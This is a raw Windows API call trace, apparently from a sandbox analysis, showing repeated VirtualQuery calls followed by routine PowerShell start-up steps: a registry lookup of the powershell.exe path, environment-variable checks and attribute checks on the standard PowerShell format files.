	[0407.549] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.549] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.549] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.550] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.551] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.968] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.969] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.969] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.970] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.971] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.972] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.975] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.975] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.983] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.995] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.996] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.996] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.996] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.996] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.997] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.997] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.997] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.372] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.373] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.373] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.373] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.373] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.375] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.376] VirtualQuery (in: lpAddress=0x20c140, lpBuffer=0x20d000, dwLength=0x30 | out: lpBuffer=0x20d000*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.377] VirtualQuery (in: lpAddress=0x20c140, lpBuffer=0x20d000, dwLength=0x30 | out: lpBuffer=0x20d000*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.377] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.389] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.811] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.812] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.814] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.251] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0409.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.252] CoTaskMemFree (pv=0x1b91c600) 
	[0409.254] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.259] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.259] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.259] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.260] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.260] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.260] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.261] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.262] VirtualQuery (in: lpAddress=0x20c130, lpBuffer=0x20cff0, dwLength=0x30 | out: lpBuffer=0x20cff0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.262] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d5e8 | out: phkResult=0x20d5e8*=0x1c8) returned 0x0
	[0409.262] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d5fc, lpData=0x0, lpcbData=0x20d5f8*=0x0 | out: lpType=0x20d5fc*=0x1, lpData=0x0, lpcbData=0x20d5f8*=0x74) returned 0x0
	[0409.262] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d56c, lpData=0x0, lpcbData=0x20d568*=0x0 | out: lpType=0x20d56c*=0x1, lpData=0x0, lpcbData=0x20d568*=0x74) returned 0x0
	[0409.263] CoTaskMemAlloc (cb=0x78) returned 0x3459d0
	[0409.263] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d53c, lpData=0x3459d0, lpcbData=0x20d538*=0x74 | out: lpType=0x20d53c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d538*=0x74) returned 0x0
	[0409.263] CoTaskMemFree (pv=0x3459d0) 
	[0409.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0409.263] SetErrorMode (uMode=0x1) returned 0x1
	[0409.263] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0409.263] SetErrorMode (uMode=0x1) returned 0x1
	[0409.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.264] SetErrorMode (uMode=0x1) returned 0x1
	[0409.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.265] SetErrorMode (uMode=0x1) returned 0x1
	[0409.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.265] SetErrorMode (uMode=0x1) returned 0x1
	[0409.265] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.265] SetErrorMode (uMode=0x1) returned 0x1
	[0409.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.265] SetErrorMode (uMode=0x1) returned 0x1
	[0409.265] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0409.265] SetErrorMode (uMode=0x1) returned 0x1
	[0409.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.266] SetErrorMode (uMode=0x1) returned 0x1
	[0409.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0409.266] SetErrorMode (uMode=0x1) returned 0x1
	[0409.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0409.266] SetErrorMode (uMode=0x1) returned 0x1
	[0409.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0409.266] SetErrorMode (uMode=0x1) returned 0x1
	[0409.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0409.267] SetErrorMode (uMode=0x1) returned 0x1
	[0409.268] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d4c0 | out: lpFileInformation=0x20d4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0409.268] SetErrorMode (uMode=0x1) returned 0x1
	[0409.269] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0409.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.269] CoTaskMemFree (pv=0x1b91c600) 
	[0409.272] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0409.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.272] CoTaskMemFree (pv=0x1b91c600) 
	[0409.272] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0409.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.272] CoTaskMemFree (pv=0x1b91c600) 
	[0409.272] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0409.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.273] CoTaskMemFree (pv=0x1b91c600) 
